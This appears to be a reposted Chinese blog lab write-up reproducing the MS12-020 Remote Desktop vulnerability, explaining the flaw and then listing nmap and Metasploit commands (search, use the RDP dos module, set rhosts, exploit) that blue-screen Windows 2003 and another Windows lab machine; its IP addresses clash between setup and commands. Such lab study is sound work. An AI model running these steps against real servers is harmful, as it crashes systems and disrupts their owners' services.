0


ms12-020(蓝屏攻击漏洞复现)

✅作者简介:CSDN内容合伙人、信息安全专业在校大学生🏆
🔥系列专栏 :内网安全-漏洞复现
📃新人博主 :欢迎点赞收藏关注,会回访!
💬舞台再大,你不上台,永远是个观众。平台再好,你不参与,永远是局外人。能力再大,你不行动,只能看别人成功!没有人会关心你付出过多少努力,撑得累不累,摔得痛不痛,他们只会看你最后站在什么位置,然后羡慕或鄙夷。


文章目录

一、原理

ms12-020漏洞的定义是指操作系统的远程桌面协议存在重大漏洞,入侵者(黑客)可以通过向远程桌面默认端口(3389)发一系列特定RDP包,从而获取超级管理员权限,进而入侵系统,Windows在处理某些RDP报文时Terminal Server 存在错误,可被利用造成服务停止响应(蓝屏)
根据实际被入侵终端进行分析,开放远程桌面服务并使用默认的3389端口的会成为攻击目标。
微软的安全公告:Windows全系列操作系统(WinXP/Vista/Win7/Win2000/ Win2003/Win2008)均存在受控威胁。

二、实验环境

攻击机:kali IP:192.168.204.128
靶机win2003 IP:192. 168.204.159
靶机win2007 IP:192.168.204.160
两者都在同一内网,采用NAT连接方式

三、漏洞复现

1、开启win2003的远程桌面:控制面板–>系统–>远程–>远程协助–>远程桌面
win2007是 计算机–>(右键)属性–>远程设置

2、控制面板–>windows防火墙–>例外–>远程桌面

3、用nmap扫描靶机,发现靶机的3389端口已经打开
输入:

nmap 192.168.252.159


4、在kali的终端中打开

msfconsole


5、使用search功能搜索ms12-020,发现有两个可用模块。
输入:

search ms12-020


6、使用第一个可用版模块
输入:

use auxiliary/dos/windows/rdp/ma12_020_maxchannelids

或者

use 1


7、利用set命令设置攻击的IP。
输入:

set rhosts 192.168.252.160
show options


8、输入:

exploit

,执行攻击

9、看一下靶机,发现靶机蓝屏了

标签: 安全 网络 web安全

本文转载自: https://blog.csdn.net/qq_53517370/article/details/128984753
版权归原作者 就你叫Martin? 所有, 如有侵权,请联系我们删除。

“ms12-020(蓝屏攻击漏洞复现)”的评论:

还没有评论